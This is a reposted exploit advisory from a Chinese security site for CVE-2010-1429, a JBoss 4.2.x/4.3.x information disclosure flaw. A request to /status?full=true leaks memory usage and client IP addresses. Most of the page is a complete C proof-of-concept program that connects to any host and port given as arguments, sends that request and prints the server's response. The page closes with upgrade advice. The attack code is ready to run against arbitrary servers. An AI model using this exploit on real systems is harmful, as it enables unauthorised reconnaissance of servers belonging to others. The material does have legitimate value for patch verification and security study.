首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
JBoss 4.2.x/4.3.x - Information Disclosure
来源:vfocus.net 作者:JameelNabbo 发布时间:2018-02-11  
# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
# Date: 02/08/2018
# Exploit Author: JameelNabbo
# Vendor Homepage: http://www.jboss.org <http://www.jboss.org/>
# Software Link: http://jbossas.jboss.org/downloads <http://jbossas.jboss.org/downloads>
# Version: 4.2X. & 4.3.X
# Tested on: Linux Ubuntu
# CVE : CVE-2010-1429
 
 
 
 
1. Description
   
By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
Example:   http://127.0.01/status?full=true
 
   
2. Proof of Concept
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
 
 
int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    
    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    
    if(sock == -1){
        perror("setsockopt");
        exit(1);
    }
    
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
        
    }
    return sock;
}
 
#define BUFFER_SIZE 1024
 
int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
    
    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }
    
    fd = socket_connect(argv[1], atoi(argv[2]));
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
         fprintf(stderr, "%s", buffer);
    }
 
    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}
 
 
3. Solution :
Update to version 4.2.3 or later
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·macOS Kernel - Use-After-Free
·Trend Micro IMSVA Management P
·Marked2 - Local File Disclosur
·glibc LD_AUDIT Arbitrary DSO L
·HPE iLO 4 < 2.53 - Add New Adm
·glibc '$ORIGIN' Expansion Priv
·HiSilicon DVR Devices - Remote
·Juju-run Agent Privilege Escal
·Dahua Generation 2/3 - Backdoo
·Herospeed - 'TelnetSwitch' Rem
·LibreOffice < 6.0.1 - '=WEBSER
·Adobe Coldfusion 11.0.03.29286
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved